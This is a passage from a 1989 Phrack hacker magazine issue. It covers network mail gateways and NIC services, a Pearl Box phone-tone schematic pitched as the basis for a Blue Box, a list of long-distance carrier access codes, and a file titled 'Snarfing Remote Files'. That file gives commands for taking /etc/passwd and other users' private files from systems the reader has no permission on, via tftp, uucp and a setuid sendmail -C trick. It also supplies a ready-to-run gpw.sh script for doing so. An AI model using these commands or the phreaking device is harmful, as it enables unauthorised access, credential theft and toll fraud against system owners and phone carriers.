  1424. networks is the cost.  Subscription costs as of 3/3/89 cost $4.75
  1425. per month or $5.75 per month for hosts that are outside of the
  1426. U.S.A.
  1427.  
  1428. You are also charged for each message that you send.  If you are
  1429. corresponding with someone who is not a DASnet subscriber, THEIR
  1430. MAIL TO YOU is billed to your account.
  1431.  
  1432. The following is an abbreviated cost list for mailing to the
  1433. different services of DASnet:
  1434.  
  1435.      PARTIAL List                DASnet Cost    DASnet Cost
  1436.      of Services                  1st 1000    Each Add'l 1000
  1437.      Linked by DASnet (e-mail)   Characters     Characters:
  1438.  
  1439.      INET, MacNET, PeaceNet,                             NOTE:  20 lines
  1440.      Unison, UUCP*, Domains,        .21            .11   of text is app.
  1441.      e.g. .COM, .EDU*                                    1000 characters.
  1442.  
  1443.      Dialcom--Any "host" in U.S.    .36            .25
  1444.  
  1445.      Dialcom--Hosts outside U.S.    .93            .83
  1446.  
  1447.      EasyLink (From EasyLink)       .21            .11
  1448.               (To EasyLink)         .55            .23
  1449.  
  1450.      U.S. FAX (internat'l avail.)   .79            .37
  1451.  
  1452.      GeoMail--Any "host" in U.S.    .21            .11
  1453.      GeoMail--Hosts outside U.S.    .74            .63
  1454.  
  1455.      MCI  (from MCI)                .21            .11
  1456.           (to MCI)                  .78            .25
  1457.           (Paper mail - USA)       2.31            .21
  1458.  
  1459.      Telemail                       .36            .25
  1460.  
  1461.      W.U. Telex--United States     1.79           1.63
  1462.      (You can also send Telexes outside the U.S.)
  1463.  
  1464.      TWICS--Japan                   .89            .47
  1465.  
  1466.   *  The charges given here are to the gateway to the network.  The DASnet
  1467.      user is not charged for transmission on the network itself.
  1468.  
  1469. Subscribers to DASnet get a free DASnet Network Directory as well
  1470. as a listing in the directory, and the ability to order optional
  1471. DASnet services like auto-porting or DASnet Telex Service which
  1472. gives you your own Telex number and answerback for $8.40 a month
  1473. at this time.
  1474.  
  1475. DASnet is a registered trademark of DA Systems, Inc.
  1476.  
  1477.                                DA Systems, Inc.  1503 E. Campbell
  1478.                              Ave.
  1479.                               Campbell, CA  95008 408-559-7434
  1480.                              TELEX:  910 380-3530
  1481.  
  1482. The following two sections on PeaceNet and AppleLink are in
  1483. association with DASnet as this network is what is used to
  1484. connect them to the Wide-Area Networks.
  1485.  
  1486. APPLELINK ~~~~~~~~~ AppleLink is a service of Apple Computer.
  1487. They have their own little network and there are a couple of
  1488. things to know about it.
  1489.  
  1490. First of all, there is an AppleLink-Bitnet Mail Relay which was
  1491. created to "enrich the cooperative research relationship of Apple
  1492. Computer and the higher education community by facilitating the
  1493. electronic exchange of information." Any Bitnet user is
  1494. automatically authorized to use the mail relay as well as all
  1495. AppleLink users.
  1496.  
  1497. To send to AppleLink from Bitnet, your header should be as
  1498. follows:
  1499.  
  1500. To:  XB.DAS@STANFORD.BITNET Subject:  username@APPLELINK!Hi, how
  1501. are things at Apple?
  1502.  
  1503. The username is the user's ID that you are sending to and the "!"
  1504. separates the DASnet To:  field from the real subject.
  1505.  
  1506. To send to Bitnet from AppleLink, your header should be as
  1507. follows:
  1508.  
  1509. To:  DASNET Subject:  C488869@UMCVMB.BITNET!Please add me to the
  1510. Phrack Subscription List.
  1511.  
  1512. The C488869@UMCVMB.BITNET (my address) is any Bitnet address and
  1513. as above, the "!" separates the address from the subject of the
  1514. message.
  1515.  
  1516. There is one other thing to mention.  Apparently, sending to
  1517. username@APPLELINK.APPLE.COM also will perform the same function.
  1518. If this does not work, try routing to
  1519. username%APPLELINK.APPLE.COM@APPLE.COM.
  1520.  
  1521. PEACENET ~~~~~~~~ PeaceNet is a computer-based communication
  1522. system "helping the peace movement throughout the world
  1523. communicate and cooperate more effectively and efficiently,"
  1524. according to their information flier.  It is networked through
  1525. Telenet and can be reached via dial-up.  To subscribe to this
  1526. service, it costs $10 to sign up.  With this sign-up fee, you
  1527. receive a user's manual and a "free" hour of off-peak computer
  1528. time (which is weekday evenings, weekends, and
  1529. holidays).  Beyond this, you pay a monthly $10 fee for another
  1530. hour of off-peak computer usage and you pay $5 for additional
  1531. PEAK hour usage.  They charge, also, for users who require extra
  1532. space on their system.  I guess peace carries a heavy cost in the
  1533. long run!  You do get 2 free hours of off-peak time though for
  1534. every additional user you bring to PeaceNet.  It is a project of
  1535. the Tides Foundation, a San Franciscan public charity, and is
  1536. managed by 3 national peace organizations (non-profit, of
  1537. course!).  Anyway, to join PeaceNet, send your name,
  1538. organizational affiliation, address, city, state, zip code,
  1539. telephone number, and who referred you to PeaceNet as well as
  1540. your credit card number with expiration date (and the name on the
  1541. card if it's different than yours) to PeaceNet, 3228 Sacramento
  1542. Street, San Francisco, CA 94115 or call them at 415-923-0900.
  1543. You can also pay by check but that requires a $50 deposit.
  1544.  
  1545. FIDONET
  1546. ~~~~~~~
  1547. FIDONET is, of course, the ever-popular group of IBM bulletin
  1548. boards that made it possible for networking to be incorporated
  1549. into bulletin board systems.  FIDONET seems to have a number of
  1550. gateways in the Wide-Area Networks.  First of all, it has its own
  1551. domain -- .ifna.org -- which makes it possible to mail right to
  1552. FIDONET without routing through UUCP gateways or whatever.  The
  1553. format for this gateway is:
  1554.  
  1555. Username@f<node #>.n<net #>.z<zone #>.ifna.org
  1556.  
  1557. In other words, if I wanted to mail to Silicon Swindler at
  1558. 1:135/5, the address would be
  1559. Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your
  1560. mailer knows the .ifna.org domain, it should get through alright.
  1561. Apparently, as of the writing of this article, they have
  1562. implemented a new gateway name called fidonet.org which should
  1563. work in place of ifna.org in all routings.  If your mailer does
  1564. not know either of these domains, use the above routing but
  1565. replace the first "@" with a "%" and then afterwards, use either
  1566. of the following mailers after the "@":  CS.ORST.EDU or
  1567. K9.CS.ORST.EDU (i.e. username%f<node #>.n<net #>.z<zone
  1568. #>.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with
  1569. K9.CS.ORST.EDU]).
  1570.  
  1571. The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was
  1572. posted on INFONETS DIGEST which lists a number of FIDONET gateways:
  1573.  
  1574. Net      Node    Node Name
  1575. ~~~      ~~~~    ~~~~~~~~~
  1576. 104      56      milehi.ifna.org
  1577. 105      55      casper.ifna.org
  1578. 107      320     rubbs.ifna.org
  1579. 109      661     blkcat.ifna.org
  1580. 125      406     fidogate.ifna.org
  1581. 128      19      hipshk.ifna.org
  1582. 129      65      insight.ifna.org
  1583. 143      N/A     fidogate.ifna.org
  1584. 152      200     castle.ifna.org
  1585. 161      N/A     fidogate.ifna.org
  1586. 369      17      megasys.ifna.org
  1587.  
  1588. NOTE:  The UUCP equivalent node name is the first part of the node name.  In
  1589.        other words, the UUCP node milehi is listed as milehi.ifna.org but can
  1590.        be mailed directly over the UUCP network.
  1591.  
  1592. Another way to mail to FIDONET, specifically for Internet people, is in this
  1593. format:
  1594.  
  1595. ihnp4!necntc!ncoast!ohiont!<net #>!<node #>!user_name@husc6.harvard.edu
  1596.  
  1597. And for those UUCP mailing people out there, just use the path described and
  1598. ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on
  1599. most any FIDONET bulletin board, but it is quite large.
  1600.  
  1601. ONTYME
  1602. ~~~~~~
  1603. Previously known as Tymnet, OnTyme is the McDonnell Douglas revision.  After
  1604. they bought out Tymnet, they renamed the company and opened an experimental
  1605. Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for
  1606. certain corporate addresses within McDonnell Douglas and Tymnet, not their
  1607. customers.  The userid format is xx.yyy or xx.y/yy where xx is a net name and
  1608. yyy (or y/yy) is a true username.  If you cannot directly nail this, try:
  1609.  
  1610. xx.yyy%ONTYME.TYMNET.COM@TYMIX.TYMNET.COM
  1611.  
  1612. A subnet of Tymnet is called GeoNet.  It is a private X.25-based
  1613. subnet that is operated by the U.S. Geological Survey, a bureau
  1614. of the U.S. Department of the Interior.  It supports about 165
  1615. host computers including about 75 USGS Primes, 50 VAXen, and 2
  1616. Amdahls.  One of their VAX systems is on BITnet at USGSRESV and
  1617. they have SPAN nodes at IFLAG1.SPAN and EROSA.SPAN.
  1618.  
  1619. THENET
  1620. ~~~~~~
  1621. The Texas Higher Education Network (THEnet) is comprised of many
  1622. of the institutions of higher education in the state of Texas.
  1623. Its backbone network protocol is DECnet.  THEnet has recently
  1624. been designated as an NSF regional network, distributing Internet
  1625. Protocol (IP) access over DECnet in some cases and utilizing
  1626. multi-protocol routers in others.  THEnet has a NIC (Network
  1627. Information Center) at THENIC.THE.NET and addresses within THEnet
  1628. are probably routed to user@destination.THE.NET.
  1629.  
  1630. UUCP PATHS AND NODE INFORMATION
  1631. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1632. Many UUCP Unix nodes have the commands uuhosts and uupath.  The
  1633. uuhosts command allows you to receive information about a
  1634. specified UUCP node such as the path, node contact, how it is
  1635. polled for USENET feeds, etc.  The uupath command simply tells
  1636. you the path from one UUCP node to another.  Well, although at
  1637. this time, this is only good for Bitnet users, this interactive
  1638. message feature is good to know just in case you need to know a
  1639. path to a particular node.  For IBM systems using RSCS network
  1640. software, use the command
  1641.  
  1642. SM RSCS CMD PSUVAX1 UUPATH node1 node2 ...
  1643.  
  1644.      (For people on VAXen with JNET network software, the format is:     )
  1645.      (SEND/COMMAND PSUVAX1 UUPATH node1                                  )
  1646.  
  1647. to receive standard information listed above from the uupath command.
  1648.  
  1649. Multiple nodes can be listed where node1 node2 represent separate UUCP nodes.
  1650.  
  1651. I've found that this can be useful in finding surrounding nodes
  1652. of the destination node in case you have a problem mailing
  1653. through a particular path or node.  You can, with this command,
  1654. use alternate routings by specifying them with a "bang-path" that
  1655. will indicate to the UUCP gateway where the message is to be sent
  1656. to next.  This is in the format of, say,
  1657. "psuvax1!catch22!msp!taran@UUCPGATE" or whatever where UUCPGATE
  1658. can be any UUCP gateway such as PSUVAX1 or UUNET.UU.NET to name a
  1659. few.
  1660.  
  1661. NICS
  1662. ~~~~
  1663. The Network Information Centers (NICs) can be extremely useful in
  1664. figuring out various problems on the networks, such as routings
  1665. or the place at which the node resides, etc.
  1666.  
  1667. BITNIC is the BITnet Network Information Center which is located
  1668. in New Jersey.  Its node name is BITNIC.BITNET and it contains a
  1669. variety of resources which can be utilized via mail or via direct
  1670. messages from Bitnet users.
  1671.  
  1672. The DATABASE@BITNIC contains lists of all kinds.  This database
  1673. does not limit itself to information about the networks.  It does
  1674. contain this information, but also holds various trivialities.
  1675. Send the HELP command either via direct message to
  1676. DATABASE@BITNIC if on Bitnet or send mail to that address
  1677. containing the command you wish to perform (i.e. send a message
  1678. saying HELP to DATABASE@BITNIC.BITNET from another network or
  1679. from Bitnet if you're at a node without direct message
  1680. capabilities).
  1681.  
  1682. LISTSERV@BITNIC contains the standard listserver files that you'd
  1683. expect to find plus some other interesting ones.  I'm not going
  1684. to take the time to tutor you, the reader, in using these, so
  1685. just send a HELP command the same as you would to DATABASE@BITNIC
  1686. for more information.
  1687.  
  1688. NETSERV@BITNIC is a file server which contains information files
  1689. pertaining to various networks that are connected to Bitnet, as
  1690. well as files about Bitnet.  From here, you can get network node
  1691. lists, information files on networks such as SPAN, ARPANET,
  1692. NETNORTH, etc. and other network related files.  This can be an
  1693. extremely useful resource when you're trying to mail someone at
  1694. another network.
  1695.  
  1696. The Data Defense Network NIC (DDN NIC) is located at SRI-NIC.ARPA
  1697. and has various useful files about the DDN as well as the
  1698. Internet.
  1699.  
  1700. There are a number of ways to obtain information from the DDN
  1701. NIC.  First of all, people on the Internet with the Telnet
  1702. capability can Telnet to SRI-NIC.ARPA and perform a number of
  1703. procedures from the pre-login screen.  First of all, you can get
  1704. TAC News updates by typing TACNEWS.  The NIC command allows you
  1705. to find various facts about the whereabouts of network
  1706. information files, etc.  The WHOIS command is probably the most
  1707. useful of these 3.  The WHOIS program allows you to find
  1708. addresses for registered users of the networks as well as
  1709. information about networks and nodes on the networks, depending
  1710. on what you ask the WHOIS program for.  To find only a certain
  1711. record type, you can use the following specifiers:
  1712.  
  1713. Arpanet        DOmain         GAteway        GRoup          HOst           IMp
  1714. Milnet         NEtwork        Organization   PSn            TAc
  1715.  
  1716. To search for a specific field, use the following specifiers:
  1717.  
  1718. HAndle or "!"    Mailbox or if it contains "@"        NAme or a "." leading
  1719.  
  1720. These features return whatever information is available from the DDN NIC
  1721. database.  If you do not have the capability to use Telnet, mail can be sent to
  1722. SERVICE@SRI-NIC.ARPA with the "SUBJECT:" line containing the following
  1723. commands:
  1724.  
  1725. HELP          This will send you a help file for using the DDN NIC.
  1726. RFC nnn       This sends you a Request For Comments file (where nnn is either
  1727.               the number of the RFC file or else is INDEX to list them).
  1728. IEN nnn       This sends you an Internet Engineering Notes file where nnn is
  1729.               the same as above.
  1730. NETINFO xxx   This feature allows you to get files about the networks where
  1731.               xxx is the filename or else the word INDEX for a list of
  1732.               available files.
  1733. HOST xxx      This returns information pertaining to the xxx host specified.
  1734. WHOIS xxx     This is the same as using the WHOIS command from Telnet.  For
  1735.               details on how to use this, send the WHOIS HELP command on the
  1736.               "Subject:" line.
  1737.  
  1738. There are other Network Information Centers throughout the networks but as far
  1739. as I know, their abilities are nothing near as powerful as SRI-NIC.ARPA.  They
  1740. are the places, though, to mail to for answers concerning those networks if
  1741. you have some question as to the workings of the network or anything else.
  1742. _______________________________________________________________________________
  1743.  
  1744.                                 ==Phrack Inc.==
  1745.  
  1746.                      Volume Three, Issue 28, File #5 of 12
  1747.  
  1748.                   /////////////////////\\\\\\\\\\\\\\\\\\\\\
  1749.                  ||                                        ||
  1750.                  || A Real Functioning PEARL BOX Schematic ||
  1751.                  ||                                        ||
  1752.                  ||        Written, Tested, and Used       ||
  1753.                  ||                                        ||
  1754.                  ||               by Dispater              ||
  1755.                  ||                                        ||
  1756.                  ||              July 1, 1989              ||
  1757.                  ||                                        ||
  1758.                   \\\\\\\\\\\\\\\\\\\\\/////////////////////
  1759.  
  1760.  
  1761. Introduction:  After reading the earlier renditions of schematics
  1762.                for the Pearl Box, I decided that there was an
  1763.                easier and cheaper way of doing the same thing
  1764.                with an IC and parts you probably have just laying
  1765.                around the house.
  1766.  
  1767.  
  1768. What Is A Pearl Box and Why Do I Want One?
  1769.  
  1770.      A Pearl Box is a tone generating device that is used to make
  1771.      a wide range of single tones.  Therefore, it would be very
  1772.      easy to modify this basic design to make a Blue Box by
  1773.      making 2 Pearl Boxes and joining them together in some
  1774.      fashion.
  1775.  
  1776.      A Pearl Box can be used to create any tone you wish that
  1777.      other boxes may not.  It also has a tone sweep option that
  1778.      can be used for numerous things like detecting different
  1779.      types of phone tapping devices.
  1780.  
  1781.  
  1782. Parts List:
  1783.  
  1784.         CD4049 RCA integrated circuit
  1785.         .1 uF disk capacitor
  1786.         1 uF 16V electrolitic capacitor
  1787.         1K resistor
  1788.         10M resistor
  1789.         1meg pot
  1790.         1N914 diode
  1791.         Some SPST momentary push-button switches
  1792.         1 SPDT toggle switch
  1793.         9 Volt battery & clip
  1794.         and miscellaneous stuff you should have laying around the house.
  1795.  
  1796.  
  1797. State-of-the-Art-Text Schematic:
  1798.                                        +  16V  1uF -
  1799.               _______________________________||_____
  1800.              |        !     !                ||     |           _
  1801.              |   _______________________            |__________| |/| 8ohms
  1802.          ____|__|_____:__|__:__|_       |            __________| | |
  1803.         | 9 10 11 12 13 14 15 16 |      |           |          |_|\|
  1804.         |        CD4049UBE       |      |           |
  1805.         |_1__2__3__4__5__6__7__8_|      :           |          _
  1806.           |  |  |__|  |__|  |  |____________________|_________[-]
  1807.           |  |  !           !           :                     [b]
  1808.           |  |__________________________|                     [a]
  1809.           |     :           :           |                     [t]
  1810.           |     !    1N914  !           !                     [t]
  1811.           |___________|/|_____________________________________[+]
  1812.                 :     |\|   :           :
  1813.                 |           |           |
  1814.                 |    10M    |           |
  1815.                 |___/\/\/\__|           |
  1816.                 |           |           |
  1817.                 |_____||____|           |  <-- These 2 wires to the center pole
  1818.                       ||    |           |      of switch.
  1819.                  .1uF   50V |           |
  1820.                             |           |
  1821.      _______________________|           |_____________________________
  1822.     |                   ___[Toggle Switch]____________                |
  1823.     |                  |                              |          ___  |
  1824.     |                  |                              |          o o  |
  1825.     |                  |                              | /\/\/\___| |__|
  1826.     |_/\/\/\____/\/\/\ |                              |    ^          |
  1827.         1K         ^   |                              |____|     ___  |
  1828.                    |___|                              |          o o  |
  1829.                                                       | /\/\/\___| |__|
  1830.           (pot side)                    (push-button  |  ^
  1831.                                             side)     |__|
  1832.  
  1833. Explanation:
  1834.  
  1835.      The 2 wires that lead from the main part of the circuit
  1836.      should be connected to the center poles on the toggle
  1837.      switch.  Put the 2 wires to the pot on one side and the 2
  1838.      wires going to the push-buttons to the other side.  That way
  1839.      you can switch between tone sweep and the favorite tones you
  1840.      like (the push-button side).
  1841.  
  1842.      To keep tones that you want to use frequently like 1850 Hz
  1843.      then all you have to do is put in a variable resistor and
  1844.      adjust it to where you have the correct tone, then just put
  1845.      a push-button switch on the line.  You can link them
  1846.      together in a chain, etc.  There are many other good
  1847.      modifications to make to the box so have fun and be smart.
  1848.  
  1849. --Dispater
  1850.  
  1851. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\?///////////////////////////////////////
  1852.                                 ==Phrack Inc.==
  1853.  
  1854.                      Volume Three, Issue 28, File #6 of 12
  1855.  
  1856.                      +++++++++++++++++++++++++++++++++++++
  1857.                      +                                   +
  1858.                      +       Snarfing Remote Files       +
  1859.                      +                                   +
  1860.                      +                by                 +
  1861.                      +                                   +
  1862.                      +           Dark OverLord           +
  1863.                      +                                   +
  1864.                      +++++++++++++++++++++++++++++++++++++
  1865.  
  1866. There are many ways of getting copies of files from a remote
  1867. system that you do not have permission to read or an account on
  1868. login on to and access them through.  Many administrators do not
  1869. even bother to restrict many access points that you can use.
  1870.  
  1871. Here are the simplest ways:
  1872.  
  1873.  
  1874. A)  Use uucp(1) [Trivial File Transfer Protocol] to retrieve a copy
  1875.     of a file if you are running on an Internet based network.
  1876.  
  1877. B) Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy
  1878.    of a file if uucp connections are running on that system.
  1879.  
  1880. C) Access one of many known security loopholes.
  1881.  
  1882.  
  1883. In the following examples, we will use the passwd file as the
  1884. file to acquire since it is a readable file that can be found on
  1885. most systems that these attacks are valid on.
  1886.  
  1887. Method A :
  1888.  
  1889. 1) First start the tftp program:  Enter the command:
  1890.  
  1891.  tftp
  1892.  
  1893.     [You have the following prompt:]
  1894.  
  1895.  tftp>
  1896.  
  1897.  
  1898. 2) The next step is to connect to the system that you wish to
  1899.     retrieve files from.  At the tftp, type:
  1900.  
  1901.  tftp> connect other.system.com
  1902.  
  1903.  
  1904. 3) Now request the file you wish to get a copy of (in our case, the
  1905.     passwd file /etc/passwd ):
  1906.  
  1907.  tftp> get /etc/passwd /tmp/passwd
  1908.  
  1909.     [You should see something that looks like the following:]
  1910.  
  1911.  Received 185659 bytes in 22 seconds.
  1912.  
  1913. 4) Now exit the tftp program with the "quit" command:
  1914.  
  1915.  tftp> quit
  1916.  
  1917. You should now have a copy of other.system.com's passwd file in
  1918. your directory.
  1919.  
  1920. NOTE:  Some Unix systems' tftp programs have a different syntax.
  1921.        The above was tested under SunOS 4.0
  1922.  
  1923. For example, on Apollos, the syntax is:
  1924.  
  1925.     tftp -{g|g!|p|r|w} <local file> <host> <foreign file>
  1926. [netascii|image]
  1927.  
  1928. Thus you must use the command:
  1929.  
  1930.  tftp -g password_file networked-host /etc/passwd
  1931.  
  1932. Consult your local "man" pages for more info (or in other words
  1933. RTFM).
  1934.  
  1935. At the end of this article, I will include a shell script that
  1936. will snarf a password file from a remote host.  To use it type:
  1937.  
  1938.  gpw system_name
  1939.  
  1940. Method B :
  1941.  
  1942. Assuming we are getting the file  /etc/passwd  from the system
  1943. uusucker, and our system has a direct uucp connection to that
  1944. system, it is possible to request a copy of the file through the
  1945. uucp links.  The following command will request that a copy of
  1946. the passwd file be copied into uucp's home directory
  1947. /usr/spool/uucppublic :
  1948.  
  1949.  uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
  1950.  
  1951. The flag "-m" means you will be notified by mail when the transfer is
  1952. completed.
  1953.  
  1954. Method C:
  1955.  
  1956.     The third possible way to access the desired file requires
  1957. that you have the login permission to the system.
  1958.  
  1959. In this case we will utilize a well-known bug in Unix's sendmail
  1960. daemon.
  1961.  
  1962. The sendmail program has and option "-C" in which you can specify
  1963. the configuration file to use (by default this file is
  1964. /usr/lib/sendmail.cf or /etc/sendmail.cf).  It should also be
  1965. noted that the diagnostics outputted by sendmail contain the
  1966. offending lines of text.  Also note that the sendmail program
  1967. runs setuid root.
  1968.  
  1969. The way you can abuse this set of facts (if you have not yet
  1970. guessed) is by specifying the file you wish read as the
  1971. configuration file.  Thus the command:
  1972.  
  1973.  sendmail -C/usr/accounts/random_joe/private/file
  1974.  
  1975. Will give you a copy of random joe's private file.
  1976.  
  1977. Another similar trick is to symlink your .mailcf file to joe's
  1978. file and mail someone.  When mail executes sendmail (to send the
  1979. mail), it will load in your .mailcf and barf out joe's stuff.
  1980.  
  1981. First, link joe's file to your .mailcf .
  1982.  
  1983.  ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
  1984.  
  1985. Next, send mail to someone.
  1986.  
  1987.  mail C488869@umcvmb.missouri.edu
  1988.  
  1989. And have fun.
  1990.  
  1991. -=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
  1992. :
  1993. : gpw copyright(c) Dark Overlord
  1994. :
  1995. /usr/ucb/tftp $1 << EOF
  1996. mode ascii
  1997. verbose
  1998. trace
  1999. get /etc/passwd /tmp/pw.$1
  2000. quit
  2001. EOF
  2002. -=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-Cut Here=-=-=-=-Cut Here=-=-=-=-=
  2003. ___________________________________________________________
  2004. ====================================================
  2005.  
  2006.                                 ==Phrack Inc.==
  2007.  
  2008.                      Volume Three, Issue 28, File #7 of 12
  2009.                      ____________________________________
  2010.                      \                                  /
  2011.                       \  Other Common Carriers (OCCs)  /
  2012.                        \                              /
  2013.                         \    A List By Equal Axis    /
  2014.                          \                          /
  2015.                           \   September 19, 1989   /
  2016.                            \______________________/
  2017.  
  2018. Hi everyone.  One hundred percent accuracy is not guaranteed.
  2019. Many small long distance companies operate for a few months or a
  2020. year and then then merge with others or go out of business, etc.
  2021. Also, not all of the places listed below work in every location.
  2022. The only ones you can assume work almost everywhere are MCI,
  2023. Sprint, AT&T, Western Union, and Telecom USA.  Most of the others
  2024. are strictly local, appearing in just a few states or cities.
  2025.  
  2026. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2027.  
  2028. 001     MidAmerican LD (Republic Telecom)
  2029. 002     AmeriCall LDC
  2030. 003     RCI Corporation
  2031. 007     Tel America
  2032. 011     Metromedia Long Distance
  2033. 012     Charter Corporation (Tri-J)
  2034. 013     Access Services
  2035. 021     Mercury
  2036. 022     MCI Telecommunications
  2037. 023     Texnet
  2038. 024     Petricca Communications Systems
  2039. 028     Texnet
  2040. 030     Valu-Line of Wichita Falls
  2041. 031     Teltec Saving Communications
  2042. 033     US Sprint
  2043. 036     Long Distance Savers
  2044. 039     Electronic Office Centers of America (EO/Tech)
  2045. 042     First Phone
  2046. 044     Allnet Communication Services (LDX, Lexitel)
  2047. 053     American Network (Starnet)
  2048. 056     American Satellite
  2049. 057     Long Distance Satellite
  2050. 059     COMNET
  2051. 060     Valu-Line of West Texas
  2052. 063     COMNET
  2053. 069     V/COM
  2054. 070     National Telephone Exchange
  2055. 080     AMTEL Systems
  2056. 084     Long Distance Service (LDS)
  2057. 085     WesTel
  2058. 088     Satellite Business Systems (MCI)
  2059. 089     Telephone Systems
  2060. 090     WesTel
  2061. 093     Rainbow Communications
  2062. 095     Southwest Communications
  2063. 099     AmeriCall
  2064. 122     RCA Global Communications
  2065. 137     All America Cables and Radio (ITT)
  2066. 142     First Phone
  2067. 146     ARGO Communications
  2068. 188     Satellite Business Systems
  2069. 201     PhoneNet
  2070. 202     ExecuLines
  2071. 203     Cypress Telecommunications (Cytel)
  2072. 204     United Telephone Long Distance
  2073. 206     United Telephone Long Distance
  2074. 211     RCI
  2075. 212     Call US
  2076. 213     Long Distance Telephone Savers
  2077. 214     Tyler Telecom
  2078. 215     Star Tel of Abilene
  2079. 217     Call US
  2080. 219     Call USA
  2081. 220     Western Union Telegraph
  2082. 222     MCI Telecommunications (SBS)
  2083. 223     Cable & Wireless Communication (TDX)
  2084. 224     American Communications
  2085. 227     ATH Communications (Call America)
  2086. 229     Bay Communications
  2087. 232     Superior Telecom
  2088. 233     Delta Communications
  2089. 234     AC Teleconnect (Alternative Communication)
  2090. 237     Inter-Comm Telephone
  2091. 239     Woof Communications (ACT)
  2092. 241     American Long Lines
  2093. 242     Choice Information Systems
  2094. 244     Automated Communications
  2095. 245     Taconic Long Distance Service
  2096. 250     Dial-Net
  2097. 252     Long Distance/USA
  2098. 253     Litel Telecommunications
  2099. 255     All-State Communications
  2100. 256     American Sharecom
  2101. 260     Advanced Communications Systems
  2102. 263     Com Systems (Sun Dial Communications)
  2103. 268     Compute-A-Call
  2104. 276     CP National (American Network, Starnet)
  2105. 284     American Telenet
  2106. 286     Clark Telecommunications
  2107. 287     ATS Communications
  2108. 288     AT&T Communications
  2109. 298     Thriftline
  2110. 302     Austin Bestline
  2111. 303     MidAmerican LD (Republic Telecom)
  2112. 311     SaveNet (American Network, Starnet)
  2113. 318     Long Distance Savers
  2114. 321     Southland Systems
  2115. 322     American Sharecom
  2116. 324     First Communication
  2117. 331     Texustel
  2118. 333     US Sprint
  2119. 336     Florida Digital Network
  2120. 338     Midco Communications
  2121. 339     Communication Cable Laying
  2122. 343     Communication Cable Laying
  2123. 345     AC Teleconnect (Alternative Communication)
  2124. 350     Dial-Net
  2125. 355     US Link
  2126. 357     Manitowoc Long Distance Service
  2127. 362     Electronic Office Centers of America (EO/Tech)
  2128. 363     Tel-Toll (Econ-O-Dial of Bishop)
  2129. 369     American Satellite
  2130. 373     Econo-Line Waco
  2131. 375     Wertern Union Telegraph
  2132. 385     The Switchboard
  2133. 393     Execulines of Florida
  2134. 400     American Sharecom
  2135. 404     MidAmerican LD (Republic Telecom)
  2136. 412     Penn Telecom
  2137. 428     Inter-Comm Telephone
  2138. 432     Lightcall
  2139. 435     Call-USA
  2140. 436     Indiana Switch
  2141. 440     Tex-Net
  2142. 441     Escondido Telephone
  2143. 442     First Phone
  2144. 444     Allnet Communication Services (LDX, Lexitel)
  2145. 455     Telecom Long Distance
  2146. 456     ARGO Communications
  2147. 462     American Network Services
  2148. 464     Houston Network
  2149. 465     Intelco
  2150. 466     International Office Networks
  2151. 469     GMW
  2152. 472     Hal-Rad Communications
  2153. 480     Chico Telecom (Call America)
  2154. 488     United States Transmission Systems (ITT)
  2155. 505     San Marcos Long Distance
  2156. 515     Burlington Telephone
  2157. 529     Southern Oregon Long Distance
  2158. 532     Long Distance America
  2159. 533     Long Distance Discount
  2160. 536     Long Distance Management
  2161. 550     Valu-Line of Alexandria
  2162. 551     Pittsburg Communication Systems
  2163. 552     First Phone
  2164. 555     TeleSphere Networks
  2165. 566     Cable & Wireless Communication (TDX)
  2166. 567     Advanced Marketing Services (Dial Anywhere)
  2167. 579     Lintel System (Lincoln Telephone LD)
  2168. 590     Wisconsin Telecommunications Tech
  2169. 599     Texas Long Distance Conroe
  2170. 601     Discount Communications Services
  2171. 606     Biz Tel Long Distance Telephone
  2172. 622     Metro America Communications
  2173. 634     Econo-Line Midland
  2174. 646     Contact America
  2175. 654     Cincinnati Bell Long Distance
  2176. 655     Ken-Tel Service
  2177. 660     Tex-Net
  2178. 666     Southwest Communications
  2179. 675     Network Services
  2180. 680     Midwest Telephone Service
  2181. 682     Ashland Call America
  2182. 684     Nacogdoches Telecommunications
  2183. 687     NTS Communications
  2184. 700     Tel-America
  2185. 704     Inter-Exchange Communications
  2186. 707     Telvue
  2187. 709     Tel-America
  2188. 717     Pass Word
  2189. 726     Procom
  2190. 727     Conroe-Comtel
  2191. 735     Marinette-Menominee Lds
  2192. 737     National Telecommunications
  2193. 741     ClayDesta
  2194. 742     Phone America of Carolina
  2195. 743     Peninsula Long Distance Service
  2196. 747     Standard Informations Services
  2197. 755     Sears Communication
  2198. 757     Pace Long Distance Service
  2199. 759     Telenet Communication (US Sprint)
  2200. 760     American Satellite
  2201. 766     Yavapai Telephone Exchange
  2202. 771     Telesystems
  2203. 777     US Sprint
  2204. 785     Olympia Telecom
  2205. 786     Shared Use Network Service
  2206. 787     Star Tel of Abilene
  2207. 788     ASCI's Telepone Express Network
  2208. 789     Microtel
  2209. 792     Southwest Communications
  2210. 800     Satelco
  2211. 801     MidAmerican LD (Republic)
  2212. 827     TCS Network Services
  2213. 833     Business Telecom
  2214. 839     Cable & Wireless Communication (TDX)
  2215. 847     VIP Connections
  2216. 850     TK Communications
  2217. 852     Telecommunicatons Systems
  2218. 859     Valu-Line of Longview
  2219. 866     Alascom
  2220. 872     Telecommunications Services
  2221. 874     Tri-Tel Communications
  2222. 879     Thriftycall (Lintel Systems)
  2223. 881     Coastal Telephone
  2224. 882     Tuck Data Communications
  2225. 883     TTI Midland-Odessa
  2226. 884     TTI Midland-Odessa
  2227. 885     The CommuniGroup
  2228. 888     Satellite Business Systems (MCI)
  2229. 895     Texas on Line
  2230. 897     Leslie Hammond (Phone America)
  2231. 898     Satellite Business Systems (MCI)
  2232. 910     Montgomery Telamarketing Communication
  2233. 915     Tele Tech
  2234. 933     North American Communications
  2235. 936     Rainbow Commuinications
  2236. 937     Access Long Distance
  2237. 938     Access Long Distance
  2238. 951     Transamerica Telecommunications
